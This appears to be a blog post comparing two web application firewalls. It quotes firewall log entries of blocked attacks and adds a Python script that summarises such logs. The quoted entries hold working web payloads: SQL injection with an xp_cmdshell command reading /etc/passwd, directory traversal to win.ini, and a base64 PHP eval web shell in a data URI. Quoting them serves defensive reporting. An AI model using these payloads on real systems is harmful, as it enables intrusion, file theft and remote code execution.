Attacks That Imunify360 Didn’t Stop (Ninja Firewall Did)

I’m posting here a small sample of the first instance of each attack, from the logs. Most of those attacks happen several times in a day (or days) from different IPs.

While Imunify360 didn’t stop them and Ninja Firewall for WordPress did, most probably there is no risk if your hosting server is correctly secured and your scripts are updated (but you never know).

Still, IMHO, they should have been blocked by Imunify360 before reaching our website. And they were not.

09/Mar/20 23:51:26 #3691436 CRITICAL

GET /index.php – Directory traversal – [GET:MauQ = 2233 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(“XSS”)</script>’,table_name FROM information_schema.tables WHERE 2>1–/**/; EXEC xp_cmdshell(‘cat ../../../etc/passwd’)#]

 

12/Mar/20 08:24:12 #2039513 CRITICAL

GET /wp-admin/admin-post.php – WP vulnerability – [GET:page = wsal-setup]

10/Mar/20 23:46:24 #7108690 HIGH 1366 185.136.165.14

GET /wp-admin/install.php – Unauthorized file access – [SERVER:SCRIPT_NAME = /wp-admin/install.php]

 

14/Mar/20 14:23:34 #4341245 CRITICAL

GET /index.php – Directory traversal – [GET:skin = ../../../../../../../../windows/win.ini%00]

 

20/Mar/20 CRITICAL GET /index.php – Obfuscated data – [GET:foro_n = 2bd1b28c5f or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) — and 1=1]

 

20/Mar/20 CRITICAL GET /index.php – Data URI scheme or PHP wrappers – [GET:file = data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FkbWluXSk7Pz54YnNoZWxs]
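
An added example, not part of the original post or of Ninja Firewall: one way to pull the "first instance of each attack" summary out of a log, with hit counts and distinct source IPs per block reason. The one-line entry layout, the `parse` and `first_instances` names, and all sample entries are assumptions modelled on the lines quoted above.

```python
import re
from datetime import datetime

# Assumed one-line layout, modelled on the entries quoted in this post:
# date time #incident SEVERITY rule ip METHOD path – reason – [detail]
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}/\w{3}/\d{2} \d{2}:\d{2}:\d{2}) #(?P<incident>\d+) "
    r"(?P<severity>[A-Z]+) (?P<rule>\d+) (?P<ip>\S+) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) [–-] (?P<reason>.+?) [–-] \[(?P<detail>.*)\]$"
)

# Constructed sample entries: documentation IPs, made-up incident and rule ids.
SAMPLE_LOG = """\
11/Mar/20 02:10:05 #1000003 HIGH 1366 203.0.113.5 GET /wp-admin/install.php – Unauthorized file access – [SERVER:SCRIPT_NAME = /wp-admin/install.php]
10/Mar/20 23:46:24 #1000001 HIGH 1366 192.0.2.10 GET /wp-admin/install.php – Unauthorized file access – [SERVER:SCRIPT_NAME = /wp-admin/install.php]
12/Mar/20 08:24:12 #1000004 CRITICAL 9001 198.51.100.7 GET /wp-admin/admin-post.php – WP vulnerability – [GET:page = wsal-setup]
12/Mar/20 09:00:00 #1000005 CRITICAL 9001 198.51.100.7 GET /wp-admin/admin-post.php – WP vulnerability – [GET:page = wsal-setup]
14/Mar/20 14:23:34 #1000006 CRITICAL 9002 192.0.2.44 GET /index.php – Directory traversal – [GET:skin = ../../../../windows/win.ini%00]
20/Mar/20 CRITICAL GET /index.php – truncated entry without time, id or IP
"""

def parse(line):
    """Parse one entry; return None when it does not match the assumed layout."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%y %H:%M:%S")
    return entry

def first_instances(log_text):
    """Group entries by block reason: earliest entry, hit count, distinct IPs."""
    summary, skipped = {}, 0
    for line in filter(str.strip, log_text.splitlines()):
        entry = parse(line)
        if entry is None:
            skipped += 1  # counted so incomplete entries are not silently lost
            continue
        group = summary.setdefault(
            entry["reason"], {"first": entry, "hits": 0, "ips": set()})
        group["hits"] += 1
        group["ips"].add(entry["ip"])
        if entry["ts"] < group["first"]["ts"]:
            group["first"] = entry
    return summary, skipped

if __name__ == "__main__":
    groups, skipped = first_instances(SAMPLE_LOG)
    for reason, g in sorted(groups.items(), key=lambda kv: kv[1]["first"]["ts"]):
        f = g["first"]
        print(f'{f["ts"]:%d/%b/%y %H:%M:%S} {f["severity"]:8} {reason}: '
              f'{g["hits"]} hits from {len(g["ips"])} IPs')
    print(f"{skipped} line(s) skipped")
```
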

